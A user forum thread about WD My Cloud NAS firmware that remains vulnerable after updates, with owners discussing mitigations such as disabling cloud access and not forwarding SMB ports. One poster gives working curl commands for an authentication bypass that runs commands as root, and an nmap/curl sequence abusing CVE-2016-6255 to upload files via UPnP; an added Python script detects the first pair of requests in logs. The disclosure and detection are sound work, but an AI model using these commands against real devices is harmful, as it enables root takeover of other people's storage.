Latest firmware still vulnerable

So, at the moment it’s not a major problem. Just make sure the computers are maintained correctly and the users educated. Not much to be worried about? I don’t use the DMZ on the router and just forward the needed ports.

Can you explain what you mean by “maintained correctly”?

Is this issue still a problem now? Is there a good summary of what to do?

Turning it off the only real solution?

Since WD haven’t identified which vulnerabilities they have fixed in the latest firmware, and which they haven’t, it’s really hard to say what is the best thing to do.

Not to mention the SambaCry vulnerability that has recently been identified, and been shown to be the basis of active attacks on systems running Samba. Other NAS vendors have released patched firmware to plug this vulnerability. WD have not.

I currently have my device with cloud access disabled.

I can only see the NAS being hit if a computer on the LAN spreads the worm to the NAS. If the SMB ports are not forwarded to the Internet then the worm on the Internet will not be able to find the Samba service on the NAS on the LAN.

As long as you keep your LAN environment clean then it should not be a problem.

How do we get Twonky media to understand playlists made in iTunes?

Wrong thread. Not related to the firmware vulnerability issues being discussed in this topic. Suggest you either use the forum search feature, magnifying glass icon upper right, to see if your question has already been discussed. Or start a new discussion topic.

For example see the past discussions on iTunes Playlists and the My Cloud:

Also see the unofficial Twonky FAQ at this link:


Thanks for the answer. I thought that the instruction was that disabling cloud access is not enough. If the WD is on the network it is vulnerable.

Can we get a Best Practices guide together?

I don’t know; I’m not a white hat security researcher. And, as I said, WD have not identified which of the nearly 100 vulnerabilities recently reported that they think they have fixed, and I’ve not seen any reports of white hats doing re-tests.

Best Practice guide? Sorry, I can’t help with that.


Is there any more progress with this?
Or more information somewhere else?

I became aware of the issues here:

Who knows? WD aren’t telling us anything about what they’ve done to fix the raft of vulnerabilities identified.

There has been a firmware upgrade, but it gives no details of what specific CVE issues have been addressed.

WD really don’t seem to take security seriously; certainly not when communicating with customers about security concerns.

That article is from March 7th. WD released new firmware in April that was supposed to address “critical security vulnerabilities”.

Unless those organizations that reported (or someone on their own) the security vulnerabilities back in March retest the My Cloud units with the updated firmware to see if the holes have been patched we won’t know if they’ve really been patched.


Please, how do I downgrade the WD My Cloud firmware to 04.05.00-101?
After upgrading to the latest version, my hard drive does not sleep. It sleeps only for a short time and then wakes up while inactive.

If one uses the forum search feature (magnifying glass icon upper right) they’ll find several past discussions on how to downgrade the single bay My Cloud to an earlier firmware version. Note however that downgrading to earlier firmware may increase the My Cloud vulnerability since it won’t have newer fixes or patches, the subject of this current discussion. Here is one such discussion on how to downgrade:

This issue isn’t really related to the subject of this discussion on the firmware being vulnerable to certain hacks. Again, use the forum search feature and search for “sleep” and you’ll find numerous discussions on how to try and deal with the single bay My Cloud when it doesn’t go into sleep mode. For example:

Thank you for the answer. I’ll read.

FWIW the latest firmware update for the MyCloud Mirror 1st Gen currently says:

Resolved critical security vulnerabilities that potentially allowed unauthorized file deletion, unauthorized command execution and authentication bypass.

-> New Release - My Cloud Mirror Firmware Release 2.11.169 (01/12/18)

However there is still at least one vulnerability described in:

which exists in / affects the newest 2.11.168 firmware of the MyCloud Mirror 1st Gen. Maybe other models / generations are affected as well. You can easily test this on your own with a Linux-based system and two simple curl calls showing the authentication bypass:

curl -i "http://IP/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1"
curl -i "http://IP/web/dsdk/DsdkProxy.php" --data "';id;'" --cookie "isAdmin=1;username=admin"

Just replace the admin in “username=admin” with a valid user and you get the following response:

HTTP/1.1 200 OK
Date: Thu, 30 Nov 2017 12:39:20 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: application/json
Content-Language: en

<br />
<b>Warning</b>:  http_response_code() expects parameter 1 to be long, string given in <b>/usr/local/modules/web/pages/dsdk/DsdkProxy.php</b> on line <b>48</b><br />
uid=0(root) gid=0(root) groups=0(root)
sh: : Permission denied

which means that you’re again able to run arbitrary commands on the system as root.
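Added example, not part of the original post or of WD's software: a log check a defender could run to spot the pair of requests posted above. It assumes the web server's access log is available in Apache combined format; the sample lines, the 5-minute window and the function names are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Apache combined log format (not from a real device).
SAMPLE_LOG = """\
192.0.2.10 - - [30/Nov/2017:12:39:18 +0000] "GET /cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1 HTTP/1.1" 200 52 "-" "curl/7.52.1"
192.0.2.10 - - [30/Nov/2017:12:39:20 +0000] "POST /web/dsdk/DsdkProxy.php HTTP/1.1" 200 310 "-" "curl/7.52.1"
192.0.2.22 - - [30/Nov/2017:12:41:02 +0000] "GET /cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6 HTTP/1.1" 200 48 "-" "Mozilla/5.0"
192.0.2.33 - - [30/Nov/2017:13:05:00 +0000] "POST /web/dsdk/DsdkProxy.php HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
WINDOW = timedelta(minutes=5)  # assumed correlation window, tune to taste


def classify(method, target):
    """Label a request as one of the two calls from the post, or None."""
    path, _, query = target.partition("?")
    params = dict(p.partition("=")[::2] for p in query.split("&") if p)
    if (path.endswith("/network_mgr.cgi")
            and params.get("cmd") == "cgi_get_ipv6" and params.get("flag") == "1"):
        return "ipv6_query"
    if method == "POST" and path.endswith("/dsdk/DsdkProxy.php"):
        return "proxy_post"
    return None


def find_suspects(log_text):
    """Return alerts for clients that send both requests within WINDOW."""
    last_query, alerts = {}, []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not in the expected format
        ip, ts, method, target, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        kind = classify(method, target)
        if kind == "ipv6_query":
            last_query[ip] = when
        elif kind == "proxy_post" and ip in last_query and when - last_query[ip] <= WINDOW:
            alerts.append({"client": ip, "time": when.isoformat(), "status": int(status)})
    return alerts


if __name__ == "__main__":
    for alert in find_suspects(SAMPLE_LOG):
        print(alert)
```

Cookies are not recorded in the default combined format, so the check keys on the request pair and its timing; a 200 status on the second request is the case to investigate first.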


At least the WD MyCloud Mirror 1st Generation with the latest firmware 2.11.168 (11/28/17) is vulnerable to the CVE-2016-6255 in libupnp listed here as well:

This can be simply checked with the following steps to upload a file to the target device:

  1. Scan for the UPnP TCP port of the device:

nmap -p 49000-49999 IP

  2. Verify that the file doesn’t exist yet:

curl -i http://IP:49154/test123

(Use the previously found port)

  3. Upload a new file:

curl -i --data "uploadtest" http://IP:49154/test123

  4. Verify that the file exists:

curl -i http://IP:49154/test123


I would love to submit this to as asked in some other threads, but I haven’t been able to create an account there for the past few days. It just says “registration failed” after submitting the registration form without giving ANY information why it failed.

If someone here has an account please go ahead and submit it.


It seems the second vulnerability has even been known for more than a year:

This topic discusses the vulnerability for the MyCloud and not for My Cloud Mirror. These are different products, so they may have different update contents/software.

That’s because this is the MyCloud forum, and NOT the Mirror forum…

And the firmware really isn’t very different, especially in the gen2/v2 version.

Exactly, that’s why I had pointed out in my initial post that my observations are from a MyCloud Mirror 1st Gen:

and that it might be possible that other models / generations are affected as well by those known / existing vulnerabilities:

And most stuff on the wiki page seems to have been tested on a MyCloud EX2 but the MyCloud Mirror 1st Gen was affected by all vulnerabilities as well.

As the MyCloud Mirror changelog contains notes about fixed vulnerabilities, where not all known ones are fixed as shown above, this might apply to the plain MyClouds as well. Thus I assume that the changelogs can’t be trusted fully.

So if you’re on a MyCloud (which you obviously are, based on this forum) you can verify the two posted vulnerabilities against your device. And if the device is still vulnerable the posts are fitting here (in the “Latest firmware still vulnerable” thread) as well.


Hi there,

Regardless of whether the vulnerabilities were closed with the latest updates, I would like to summarize for myself: what are the steps to protect yourself? So I update the firmware; that is first and for sure.
Disabling Cloud Access was also important. But what else can / must one do? On the router? On the MyCloud device? In the dashboard? Disabling UPnP, as far as I can remember?

Can we summarize? :thinking: